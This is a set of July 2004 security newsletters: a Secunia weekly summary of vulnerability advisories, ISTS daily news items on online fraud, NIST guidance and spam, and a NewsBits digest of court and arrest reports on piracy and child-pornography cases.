A survey by LogicaCMG reveals that over one million UK consumers have experienced "an attempted or actual theft of financial or personal details" whilst carrying out online transactions, such as banking and shopping. According to the study, these security breaches have had real-world consequences for online businesses as 24% of affected consumers decided to switch to an alternative online brand, while 23% decided never to do business with the company again. It appears that online security is the most important issue for a majority of UK consumers (73%) when conducting transactions on the Internet. Companies that allow security breaches to occur could face serious revenue losses and a loss of business and reputation.

http://www.channelminds.com/article.php3?id_article=2153

Title: Web app vulnerabilities on the rise
Source: vnunet.com
Date Written: July 7, 2004
Date Collected: July 8, 2004
A study by security firm Imperva on the vulnerability of public and private web applications has found that, despite periodic penetration testing and attempts to fix vulnerabilities, 93% of web applications contain 'high' or 'critical' vulnerabilities. In many cases, new flaws are introduced while trying to close security holes after initial penetration tests have been conducted. Such application flaws leave organizations vulnerable to "web attacks, internal database breaches and worms".

http://www.vnunet.com/news/1156498

Best Practices & Risk Management

Title: NIST offers technical guidance for e-authentication
Source: Government Computer News
Date Written: July 6, 2004
Date Collected: July 8, 2004
The US National Institute of Standards and Technology (NIST) has released two new special publications dealing with information security. NIST Special Publication 800-63, 'Electronic Authentication Guideline,' released on June 30, 2004, provides technical requirements for agencies using electronic authentication based on four security levels previously defined by the Office of Management and Budget (OMB). The second document, NIST Special Publication 800-27 Revision A, 'Engineering Principles for Information Technology Security,' was released on July 2, 2004 and offers basic information on security guidelines and practices.

http://www.gcn.com/vol1_no1/daily-updates/26502-1.html
Also - http://www.fcw.com/fcw/articles/2004/0705/web-nist-07-07-04.asp

Title: Security spending rises, as do risks
Source: vnunet.com
Date Written: July 8, 2004
Date Collected: July 8, 2004
A major survey of 7,000 technology and security professionals in 40 countries, conducted by Computing and its international sister publications, shows that IT security spending is on the rise across the world, but security threats, such as computer viruses, worms and insider attacks, remain a serious worry. According to the 'Information Security Survey', 59% of North American companies and 57% of businesses in Europe will increase security spending in 2004. However, as the number and cost of cyber attacks continue to increase, security remains a major problem. The survey found that often security practices and policies are inadequate. For instance, 60% of respondents do not provide their employees with security awareness training and many do not have e-mail or web usage guidelines.

http://www.vnunet.com/news/1156507

Civil & Consumer Issues

Title: 'Phonics' Co. Settles Privacy Complaint
Source: Washington Post (AP)
Date Written: July 7, 2004
Date Collected: July 8, 2004
The US Federal Trade Commission (FTC) announced, on July 7, 2004, that it has reached a settlement with Gateway Learning Corp. of Santa Ana, California, makers of the Hooked on Phonics brand of reading instruction programs, for "alleged unfair and deceptive practices in connection with its rental of customer information to third parties". The company's privacy policy had initially promised not to disclose personal customer information to third parties, but was changed in July 2003 without notifying customers to allow for the sale of personal information to marketers. Under the settlement, Gateway Learning has agreed to pay $4,608, but did not admit to any wrongdoing. "If you collected information from customers under one policy, you can't retroactively apply a new policy to that data unless the customer agrees," said Howard Beales, director of the FTC's bureau of consumer protection.

http://www.washingtonpost.com/wp-dyn/articles/A34055-2004Jul7.html
Also - http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,94369,00.html

Also - http://www.msnbc.msn.com/id/5386195

Title: Postini: Half of all e-mail requests rejected
Source: Computerworld
Date Written: July 8, 2004
Date Collected: July 8, 2004
New figures from California-based anti-spam company Postini Inc. show that only 11% of the 10.75 billion SMTP (Simple Mail Transfer Protocol) connections the company receives each month constitute legitimate e-mail messages. Postini manages e-mail for about 3,300 companies and 5 million e-mail users worldwide. The company is dropping 53% of all e-mail connections without examining the content of messages based on analysis of the behavior of Internet-connected machines that send mail. Such 'suspicious' connections increased from 35% in October 2003 to the current level of 53%. The increase is mainly the result of increased activity from compromised home computers that are being used as spam 'zombies', according to Postini. Of the connections that are accepted, 76% of messages are spam and 1-2% contain viruses. Internet service providers, technology firms and lawmakers have recently examined a variety of legislative, policy and technological solutions to the spam epidemic and progress is being made in all these areas.

http://www.computerworld.com/softwaretopics/software/groupware/story/0,10801,94378,00.html

Institute for Security Technology Studies
Dartmouth College
45 Lyme Road, Suite 200
Hanover, NH 03755
Tel: (603) 646 0700
E-mail: dailyreport@ists.dartmouth.edu

INFOCON Mailing List @
IWS - The Information Warfare Site
http://www.iwar.org.uk

SEC: Guilty plea on computer hacking

Guilty plea on computer hacking - 2004-07-08 - Silicon Valley/San Jose Business Journal

SEC: Secunia Weekly Summary - Issue: 2004-28

Gmail - [ISN] Secunia Weekly Summary - Issue: 2004-28

========================================================================

The Secunia Weekly Advisory Summary
2004-07-01 - 2004-07-08

This week : 47 advisories

========================================================================
Table of Contents:

1. Word From Secunia
2. This Week In Brief
3. This Week's Top Ten Most Read Advisories
4. Vulnerabilities Summary Listing
5. Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

New Features at Secunia.com

Secunia has implemented various statistical features at the websites
for both Secunia advisories and Virus Information.

Secunia Advisories Statistics:
http://secunia.com/advisory_statistics/

Examples of Specific Product Statistics:
http://secunia.com/product/11/ (Internet Explorer 6)
http://secunia.com/product/761/ (Opera 7.x)
http://secunia.com/product/1480/ (Mozilla 1.3)

Secunia Virus Information Statistics:
http://secunia.com/virus_statistics/

Furthermore, Secunia has made it possible for you to include all graphs
available at secunia.com on your own website.

This is described in detail at:
http://secunia.com/secunia_image_inclusion/

========================================================================
2) This Week in Brief:

ADVISORIES:

IBM Lotus Domino Web Access (formerly iNotes) is vulnerable to an
issue, which can be exploited by malicious people to cause a DoS
(Denial of Service).

The vulnerability is caused due to an unspecified error when
processing mails and can be exploited by sending a mail containing an
overly large, specially crafted JPG image attachment (about 12 MB) to
a vulnerable system.

Successful exploitation reportedly crashes the whole Domino server,
when the mail is opened.

http://secunia.com/SA12007

Mozilla and Mozilla Firefox are vulnerable to an issue, which allows
malicious websites to trick users into accepting security dialog boxes.

The problem is that it may be possible to trick users into typing or
clicking on a XPInstall / Security dialog box, using various
interactive events, without the user noticing the dialog box.

Successful exploitation may allow a malicious website to perform tasks
that require user interaction.

http://secunia.com/SA12007

VIRUS ALERTS:

During the last week, Secunia issued two MEDIUM RISK virus alerts.
Please refer to the grouped virus profile below for more information:

Bagle.AD - MEDIUM RISK Virus Alert - 2004-07-04 21:48 GMT+1
http://secunia.com/virus_information/10430/bagle.ad/

Lovgate.Y - MEDIUM RISK Virus Alert - 2004-07-02 02:29 GMT+1
http://secunia.com/virus_information/10388/lovgate.y/

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA11978] Multiple Browsers Frame Injection Vulnerability
2. [SA11966] Internet Explorer Frame Injection Vulnerability
3. [SA11793] Internet Explorer Local Resource Access and Cross-Zone
Scripting Vulnerabilities
4. [SA10395] Internet Explorer URL Spoofing Vulnerability
5. [SA11999] Mozilla XPInstall Dialog Box Security Issue
6. [SA11996] Linux Kernel File Group ID Manipulation Vulnerability
7. [SA11856] Mozilla Browser Address Bar Spoofing Weakness
8. [SA11901] Opera Address Bar Spoofing Security Issue
9. [SA11830] Internet Explorer Security Zone Bypass and Address Bar
Spoofing Vulnerability
10. [SA12020] MySQL Authentication Vulnerabilities

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA12006] Easy Chat Server Multiple Vulnerabilities
[SA12026] Comersus Shopping Cart Cross-Site Scripting and Price
Manipulation
[SA12016] Fastream NETFile FTP/Web Server Directory Traversal
Vulnerability
[SA12011] Mbedthis AppWeb Multiple Vulnerabilities
[SA11985] Easy Chat Server Directory Traversal Vulnerability
[SA11988] WinGate Proxy File Retrieval Vulnerability
[SA12012] 12Planet Chat Server Cross-Site Scripting Vulnerability
[SA12022] UnrealIRCd IP Cloaking Bypassing Weakness

UNIX/Linux:
[SA12023] Red Hat update for httpd
[SA12017] Open WebMail "vacation.pl" Arbitrary Program Execution
Vulnerability
[SA12005] Debian update for webmin
[SA12002] Debian update for pavuk
[SA11989] Fedora update for mailman
[SA11982] Fedora update for kernel
[SA11980] Linux Kernel Netfilter TCP Option Matching Denial of Service
Vulnerability
[SA12004] Gentoo update for apache2
[SA12001] Gentoo update for pure-ftpd
[SA12000] Netegrity IdentityMinder Cross-Site Scripting Vulnerability
[SA11993] Fedora update for rsync
[SA11992] Pure-FTPd Multiple Connection Denial of Service
Vulnerability
[SA12025] Mandrake update for kernel
[SA12019] Gentoo update for xfree
[SA11998] Red Hat update for kernel
[SA11997] Fedora update for kernel
[SA11996] Linux Kernel File Group ID Manipulation Vulnerability
[SA12009] SuSE update for kernel
[SA12003] Gentoo update for kernel
[SA11991] Gentoo esearch Insecure Temporary File Creation
Vulnerability
[SA11990] IBM Informix I-Spy "runbin" Privilege Escalation
Vulnerability
[SA11986] RSBAC Privilege Escalation Vulnerabilities
[SA11983] FreeBSD Linux Compatibility Mode System Call Handling
Vulnerability
[SA11981] Linux Kernel Sbus PROM Driver Multiple Integer Overflow
Vulnerabilities
[SA12021] Linux VServer procfs Permission Weakness
[SA12008] Oracle 10g Installer Insecure Temporary File Creation

Other:
[SA12014] Enterasys XSR Routers "Record Route" Option Denial of
Service
[SA12018] D-Link DI-624 Multiple Vulnerabilities
[SA11994] NetScreen 5GT Firewall AV Scan Engine Cross-Site Scripting
Vulnerability
[SA11984] ZyXEL Prestige Routers Denial of Service Vulnerability

Cross Platform:
[SA12013] IBM WebSphere Application Server Denial of Service
[SA12007] IBM Lotus Domino Web Access Message Handling Denial of
Service
[SA11999] Mozilla XPInstall Dialog Box Security Issue
[SA11987] Centre Inclusion of Arbitrary Files and SQL Injection
[SA12024] Ethereal Multiple Vulnerabilities
[SA12020] MySQL Authentication Vulnerabilities
[SA12015] SCI Photo Chat Cross-Site Scripting Vulnerability
[SA12010] Brightmail Unauthorised Access to Filtered Mails
[SA11995] Lotus Domino IMAP Quota Manipulation Weakness

========================================================================
5) Vulnerabilities Content Listing

Windows:--

[SA12006] Easy Chat Server Multiple Vulnerabilities

Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, DoS, System access
Released: 2004-07-05

Multiple vulnerabilities have been reported in Easy Chat Server,
allowing malicious people to cause a DoS (Denial of Service), conduct
cross-site scripting attacks, and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/12006/

--

[SA12026] Comersus Shopping Cart Cross-Site Scripting and Price
Manipulation

Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2004-07-08

Thomas Ryan has reported some vulnerabilities in Comersus Shopping
Cart, which can be exploited by malicious people to conduct cross-site
scripting attacks or manipulate orders.

Full Advisory:
http://secunia.com/advisories/12026/

--

[SA12016] Fastream NETFile FTP/Web Server Directory Traversal
Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Manipulation of data, Exposure of sensitive information
Released: 2004-07-06

aT4r ins4n3 has reported a vulnerability in Fastream NETFile FTP/Web
Server, allowing malicious people to retrieve arbitrary files.

Full Advisory:
http://secunia.com/advisories/12016/

--

[SA12011] Mbedthis AppWeb Multiple Vulnerabilities

Critical: Moderately critical
Where: From remote
Impact: Unknown, Security Bypass, Exposure of sensitive
information
Released: 2004-07-07

Multiple vulnerabilities have been discovered in Mbedthis AppWeb. Some
currently have an unknown impact and others may be exploited by
malicious people to gain knowledge of sensitive information or bypass
certain security restrictions.

Full Advisory:
http://secunia.com/advisories/12011/

--

[SA11985] Easy Chat Server Directory Traversal Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information, Exposure of system
information
Released: 2004-07-02

Dr_insane has reported a vulnerability in Easy Chat Server, which can
be exploited by malicious people to read arbitrary files on a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/11985/

--

[SA11988] WinGate Proxy File Retrieval Vulnerability

Critical: Moderately critical
Where: From local network
Impact: Security Bypass, Exposure of sensitive information
Released: 2004-07-02

iDefense has reported a vulnerability in WinGate, allowing malicious
people to retrieve arbitrary files.

Full Advisory:
http://secunia.com/advisories/11988/

--

[SA12012] 12Planet Chat Server Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-07-05

Donato Ferrante has reported a vulnerability in 12Planet Chat Server,
which can be exploited by malicious people to conduct cross-site
scripting attacks.

Full Advisory:
http://secunia.com/advisories/12012/

--

[SA12022] UnrealIRCd IP Cloaking Bypassing Weakness

Critical: Not critical
Where: From remote
Impact: Security Bypass
Released: 2004-07-06

bartavelle has reported a weakness in UnrealIRCd, which can be
exploited by malicious users to bypass certain security features.

Full Advisory:
http://secunia.com/advisories/12022/

UNIX/Linux:--

[SA12023] Red Hat update for httpd

Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2004-07-06

Red Hat has issued an update for httpd. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/12023/

--

[SA12017] Open WebMail "vacation.pl" Arbitrary Program Execution
Vulnerability

Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-07-06

Ken Girrard has reported a vulnerability in Open WebMail, which can be
exploited by malicious users to execute arbitrary applications.

Full Advisory:
http://secunia.com/advisories/12017/

--

[SA12005] Debian update for webmin

Critical: Moderately critical
Where: From remote
Impact: Security Bypass, DoS
Released: 2004-07-05

Debian has issued an update for webmin. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/12005/

--

[SA12002] Debian update for pavuk

Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-07-05

Debian has issued an update for pavuk. This fixes a vulnerability,
which can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/12002/

--

[SA11989] Fedora update for mailman

Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2004-07-02

Fedora has issued an update for mailman. This fixes a vulnerability,
which can be exploited by malicious people to retrieve members'
passwords.

Full Advisory:
http://secunia.com/advisories/11989/

--

[SA11982] Fedora update for kernel

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-01

Fedora has issued an update for the kernel. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/11982/

--

[SA11980] Linux Kernel Netfilter TCP Option Matching Denial of Service
Vulnerability

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-01

Adam Osuchowski and Tomasz Dubinski have reported a vulnerability in
the Linux kernel, which can be exploited by malicious people to cause a
DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/11980/

--

[SA12004] Gentoo update for apache2

Critical: Less critical
Where: From remote
Impact: DoS
Released: 2004-07-05

Gentoo has issued an update for apache2. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/12004/

--

[SA12001] Gentoo update for pure-ftpd

Critical: Less critical
Where: From remote
Impact: DoS
Released: 2004-07-05

Gentoo has issued an update for pure-ftpd. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

Full Advisory:
http://secunia.com/advisories/12001/

--

[SA12000] Netegrity IdentityMinder Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-07-05

HEXVIEW has reported a vulnerability in Netegrity IdentityMinder,
allowing malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/12000/

--

[SA11993] Fedora update for rsync

Critical: Less critical
Where: From remote
Impact: Security Bypass, Manipulation of data
Released: 2004-07-02

Fedora has issued an update for rsync. This fixes a vulnerability,
potentially allowing malicious people to write files outside the
intended directory.

Full Advisory:
http://secunia.com/advisories/11993/

--

[SA11992] Pure-FTPd Multiple Connection Denial of Service
Vulnerability

Critical: Less critical
Where: From remote
Impact: DoS
Released: 2004-07-05

A vulnerability has been discovered in Pure-FTPd, allowing malicious
people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/11992/

--

[SA12025] Mandrake update for kernel

Critical: Less critical
Where: From local network
Impact: Manipulation of data, Exposure of system information,
Exposure of sensitive information, Privilege escalation
Released: 2004-07-07

MandrakeSoft has issued an update for the kernel. This fixes multiple
vulnerabilities, which can be exploited by malicious users to bypass
certain security restrictions, gain knowledge of sensitive information
or escalate privileges.

Full Advisory:
http://secunia.com/advisories/12025/

--

[SA12019] Gentoo update for xfree

Critical: Less critical
Where: From local network
Impact: Security Bypass
Released: 2004-07-06

Gentoo has issued an update for xfree. This fixes a security issue,
which potentially may allow malicious users to gain unintended access
to a system.

Full Advisory:
http://secunia.com/advisories/12019/

--

[SA11998] Red Hat update for kernel

Critical: Less critical
Where: From local network
Impact: Manipulation of data
Released: 2004-07-02

Red Hat has issued an update for the kernel. This fixes a
vulnerability, which can be exploited by malicious users to bypass
certain security restrictions.

Full Advisory:
http://secunia.com/advisories/11998/

--

[SA11997] Fedora update for kernel

Critical: Less critical
Where: From local network
Impact: Manipulation of data, Privilege escalation, DoS
Released: 2004-07-02

Fedora has issued an update for the kernel. This fixes some
vulnerabilities, which can be exploited by malicious users to bypass
certain security restrictions, cause a DoS (Denial of Service) or
potentially gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/11997/

--

[SA11996] Linux Kernel File Group ID Manipulation Vulnerability

Critical: Less critical
Where: From local network
Impact: Manipulation of data
Released: 2004-07-02

SuSE has discovered a vulnerability in the Linux kernel, which can be
exploited by malicious users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/11996/

--

[SA12009] SuSE update for kernel

Critical: Less critical
Where: Local system
Impact: Exposure of system information, Exposure of sensitive
information, Privilege escalation
Released: 2004-07-05

SuSE has issued an update for the kernel. This fixes multiple
vulnerabilities, which can be exploited by malicious, local users to
gain escalated privileges, cause a DoS (Denial of Service), or gain
knowledge of sensitive information.

Full Advisory:
http://secunia.com/advisories/12009/

--

[SA12003] Gentoo update for kernel

Critical: Less critical
Where: Local system
Impact: Security Bypass, Exposure of system information, Exposure
of sensitive information, Privilege escalation, DoS
Released: 2004-07-05

Gentoo has issued an update for the kernel. This fixes multiple
vulnerabilities, which can be exploited by malicious users to gain
escalated privileges, cause a DoS (Denial of Service), or gain
knowledge of sensitive information.

Full Advisory:
http://secunia.com/advisories/12003/

--

[SA11991] Gentoo esearch Insecure Temporary File Creation
Vulnerability

Critical: Less critical
Where: Local system
Impact: Privilege escalation, DoS
Released: 2004-07-02

Tavis Ormandy has discovered a vulnerability in esearch for Gentoo
Linux, which can be exploited by malicious, local users to perform
certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/11991/

--

[SA11990] IBM Informix I-Spy "runbin" Privilege Escalation
Vulnerability

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-07-02

A vulnerability has been discovered in IBM Informix I-Spy, which can be
exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/11990/

--

[SA11986] RSBAC Privilege Escalation Vulnerabilities

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-07-02

Two vulnerabilities have been reported in RSBAC, potentially allowing
malicious, local users to escalate their privileges.

Full Advisory:
http://secunia.com/advisories/11986/

--

[SA11983] FreeBSD Linux Compatibility Mode System Call Handling
Vulnerability

Critical: Less critical
Where: Local system
Impact: Exposure of system information, Exposure of sensitive
information, Privilege escalation
Released: 2004-07-02

Tim Robbins has discovered a vulnerability in FreeBSD, which can be
exploited by malicious, local users to gain knowledge of sensitive
information or gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/11983/

--

[SA11981] Linux Kernel Sbus PROM Driver Multiple Integer Overflow
Vulnerabilities

Critical: Less critical
Where: Local system
Impact: Privilege escalation, DoS
Released: 2004-07-02

infamous41 has reported some vulnerabilities in the Linux kernel, which
can be exploited by malicious, local users to cause a DoS (Denial of
Service) and potentially gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/11981/

--

[SA12021] Linux VServer procfs Permission Weakness

Critical: Not critical
Where: Local system
Impact: Exposure of sensitive information, DoS
Released: 2004-07-06

Veit Wahlich has reported a weakness in Linux VServer, which can be
exploited by certain malicious, local users to cause a DoS (Denial of
Service) or gain knowledge of sensitive information.

Full Advisory:
http://secunia.com/advisories/12021/

--

[SA12008] Oracle 10g Installer Insecure Temporary File Creation

Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2004-07-05

Knud Erik Højgaard has reported a security issue in Oracle Database
10g, allowing malicious users to manipulate temporary files.

Full Advisory:
http://secunia.com/advisories/12008/

Other:--

[SA12014] Enterasys XSR Routers "Record Route" Option Denial of
Service

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-06

Frederico Queiroz has reported a vulnerability in Enterasys XSR-1800
and XSR-3000 Series, which can be exploited by malicious people to
cause a Denial of Service.

Full Advisory:
http://secunia.com/advisories/12014/

--

[SA12018] D-Link DI-624 Multiple Vulnerabilities

Critical: Moderately critical
Where: From local network
Impact: DoS, Cross Site Scripting
Released: 2004-07-06

Gregory Duchemin has reported multiple vulnerabilities in D-Link
DI-624, which can be exploited by malicious people to cause a DoS
(Denial of Service) or conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/12018/

--

[SA11994] NetScreen 5GT Firewall AV Scan Engine Cross-Site Scripting
Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-07-02

A vulnerability has been discovered in NetScreen ScreenOS, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/11994/

--

[SA11984] ZyXEL Prestige Routers Denial of Service Vulnerability

Critical: Less critical
Where: From local network
Impact: DoS
Released: 2004-07-01

Sami Gascón has reported a vulnerability in ZyXEL Prestige, allowing
malicious people to cause a Denial of Service.

Full Advisory:
http://secunia.com/advisories/11984/

Cross Platform:--

[SA12013] IBM WebSphere Application Server Denial of Service

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-06

Leandro Meiners has reported a vulnerability in IBM WebSphere, allowing
malicious people to cause a Denial of Service.

Full Advisory:
http://secunia.com/advisories/12013/

--

[SA12007] IBM Lotus Domino Web Access Message Handling Denial of
Service

Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-07-05

Andreas Klein has reported a vulnerability in IBM Lotus Domino Web
Access (formerly iNotes), which can be exploited by malicious people to
cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/12007/

--

[SA11999] Mozilla XPInstall Dialog Box Security Issue

Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-07-05

Jesse Ruderman has reported a security issue in Mozilla and Mozilla
Firefox, allowing malicious websites to trick users into accepting
security dialog boxes.

Full Advisory:
http://secunia.com/advisories/11999/

--

[SA11987] Centre Inclusion of Arbitrary Files and SQL Injection

Critical: Moderately critical
Where: From remote
Impact: Manipulation of data, System access
Released: 2004-07-02

Manip has reported two vulnerabilities in Centre, allowing malicious
people to include arbitrary files and conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/11987/

--

[SA12024] Ethereal Multiple Vulnerabilities

Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2004-07-07

Three vulnerabilities have been discovered in Ethereal, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/12024/

--

[SA12020] MySQL Authentication Vulnerabilities

Critical: Moderately critical
Where: From local network
Impact: Security Bypass, Privilege escalation
Released: 2004-07-06

Chris Anley has reported two vulnerabilities in MySQL, allowing
malicious people to gain access to the database or the local system.

Full Advisory:
http://secunia.com/advisories/12020/

--

[SA12015] SCI Photo Chat Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-07-06

Donato Ferrante has reported a vulnerability in SCI Photo Chat,
potentially allowing malicious people to conduct cross-site scripting
attacks.

Full Advisory:
http://secunia.com/advisories/12015/

--

[SA12010] Brightmail Unauthorised Access to Filtered Mails

Critical: Not critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2004-07-05

Thomas Springer has reported a privacy issue in Brightmail, potentially
allowing malicious users to read arbitrary mails.

Full Advisory:
http://secunia.com/advisories/12010/

--

[SA11995] Lotus Domino IMAP Quota Manipulation Weakness

Critical: Not critical
Where: From remote
Impact: Security Bypass
Released: 2004-07-02

Andreas Klein has reported a weakness in Lotus Domino, which can be
exploited by malicious users to manipulate certain configuration
options.

Full Advisory:
http://secunia.com/advisories/11995/

========================================================================

Secunia recommends that you verify all advisories you receive,
by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use
those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45

========================================================================

_________________________________________
Help InfoSec News with a donation: http://www.c4i.org/donation.html

SEC: [INFOCON] NewsBits - 07/08/04

Gmail - [INFOCON] NewsBits - 07/08/04

NewsBits for July 8, 2004
************************************************************

DrinkorDie suspect back in Oz jail
The alleged ringleader of a gang of Internet copyright
pirates was back in jail last night after US authorities
won the latest round in their battle to extradite him
from Australia on multi-million dollar software piracy
charges. Hew Raymond Griffiths, 41, of Bateau Bay, New
South Wales, returned to Silverwater jail after judge
Peter Jacobson ruled magistrate Daniel Reiss was wrong
to release him on bail in March. He said that Reiss's
reasoning was incorrect in concluding that no extraditable
offence had been committed. The judgment is a setback
for defence efforts to have Griffiths tried in Australia,
but it does not mark a definitive ruling.
http://www.theregister.co.uk/2004/07/08/drinkordie_suspect_remanded_again/
http://zdnet.com.com/2100-1104_2-5260914.html
http://news.zdnet.co.uk/business/legal/0,39020651,39159881,00.htm
- - - - - - - - - -
Five Guilty of Computer Sales to Terror Nations
A federal jury in Dallas convicted five brothers
of illegally selling computers to countries that
supported terrorism. The men, who ran a computer
company called InfoCom Corp., were convicted of
conspiracy to violate export regulations and
sanctions against Libya and making false statements
on export shipping documents. Defense lawyers said
the brothers — Ghassan, Basman, Bayan, Hazim and
Ihsan Elashi — were unfairly targeted for prosecution
because of their Middle Eastern background.
(LA Times article, free registration required)
http://www.latimes.com/technology/la-na-briefs8.1jul08,1,7499895.story
- - - - - - - - - -
Police keelhaul world's thickest DVD pirate
An Essex man has secured the title of the world's
thickest DVD pirate after walking into a Chelmsford
Trading Standards office and offering his illicit
wares to the gobsmacked staff. The master criminal
apparently didn't notice the sign above the door
before making his pitch. Trading Standards' officers
very naturally expressed a keen interest in the
bootlegged movies, at which point the man belatedly
realised his error and legged it. He did, however,
leave a memento of his visit - his stash of films
and £210 in cash.
http://www.theregister.co.uk/2004/07/08/worlds_thickest_pirate/
- - - - - - - - - -
Child porn collector gets two-year suspended sentence
An Englishman caught at his home in Cork with thousands
of pornographic images of children was given a two-year
suspended jail sentence today after it was claimed that
he had undergone psychiatric counselling and was no
longer a risk to others in the community. Mr Ashman
admitted last June the offence of knowingly having in
his possession on November 19, 2001, child pornography,
namely a Gateway computer containing naked images of
female children.
http://212.2.162.45/news/story.asp?j=109975032&p=yx9975738&n=109975792
- - - - - - - - - -
Ex-treasurer of firefighters group sentenced on child porn charge
A West Covina firefighter was sentenced Tuesday for
stealing money from a firefighters' group to pay for
visits to online child pornography sites. As part of
a negotiated agreement, Michael Brawn was sentenced
to three years of probation and also was ordered by
Superior Court Judge Mark Grant Nelson to register
as a sex offender.
http://www.mercurynews.com/mld/mercurynews/news/local/states/california/the_valley/9094963.htm
- - - - - - - - - -
NBI cracks down on hi-tech child porn
The National Bureau of Investigation last Saturday
arrested suspected members of a child pornography
ring operating in Laguna, GMA Network's "24 Oras"
newscast reported Monday. The suspects were said
to be pimping dozens of children, aged 5 to 16,
to foreigners by posting nude pictures on several
websites. An operation was set up in Calamba,
Laguna in which members of the NBI posed as
customers. Some of the suspects brought about 22
boys and girls as "samples," the newscast reported.
http://www.inq7.net/brk/2004/jul/05/brkinf_1-1.htm
- - - - - - - - - -
COP CHIEF PROBED OVER CHILD PORN
A POLICE chief is being investigated on suspicion of
accessing child pornography on the internet. Officers
raided the home of British Transport Police Chief Supt
David Bruce, 43, and seized his computer. He is the
highest-ranking policeman to be quizzed in the anti-
paedophile Operation Ore. Married Mr Bruce, from Milton
Keynes, Bucks, had been promoted a week before the raid
and was tipped to become a future Chief Constable. Last
night British Transport Police said: "Chief Supt Bruce
was suspended from duty on Tuesday, June 22, pending
an investigation by Thames Valley police."
http://www.mirror.co.uk/news/allnews/tm_objectid=14393950&method=full&siteid=50143&headline=cop-chief-probed-over-child-porn-name_page.html
- - - - - - - - - -
Conway newspaper editor faces child porn charges
A local newspaper editor, arraigned yesterday on charges
relating to child pornography and using a computer to
transmit the images, could face additional charges as
the investigation into the case continues. Guy Priel,
38, of Puddin Pond Drive, is the community editor for
the Conway Daily Sun. He was arrested last Friday,
following an investigation that began in May when Priel
allegedly exchanged e-mails with someone court papers
described as "a teenage male whose sexual preference"
is boys.
http://www.theunionleader.com/articles_showfast.html?article=40392
- - - - - - - - - -
Ex-assistant principal faces child-porn charges
A former Lufkin High School assistant principal has been
charged with possessing child pornography. Charles Dexter
Lewis, 35, was free today on $20,000 bail. He resigned
after being accused of sending nude pictures of himself
to a 16-year-old female student. Lewis was initially
charged with a misdemeanor of displaying harmful material
to a minor. But police told The Lufkin Daily News for
today's editions that a search of Lewis' home computers
found several photos and videos of children engaged
in sexual activity.
http://www.chron.com/cs/CDA/ssistory.mpl/metropolitan/2667352
- - - - - - - - - -
Former foster parent charged in child porn case
A former foster parent from Blue Hill, Jeffery D. Myers,
has been charged with manufacturing and possessing child
pornography and sexual assault of a child. Attorney
General Jon Bruning announced the charges - all felonies
- Wednesday morning. "He's a child pornographer. He took
these kids and he asked them to make movies," Bruning
said, holding up a computer disk. "There are hundreds of
pictures here that would make you sick to your stomach."
http://www.omaha.com/index.php?u_np=0&u_pg=1638&u_sid=1142009
- - - - - - - - - -
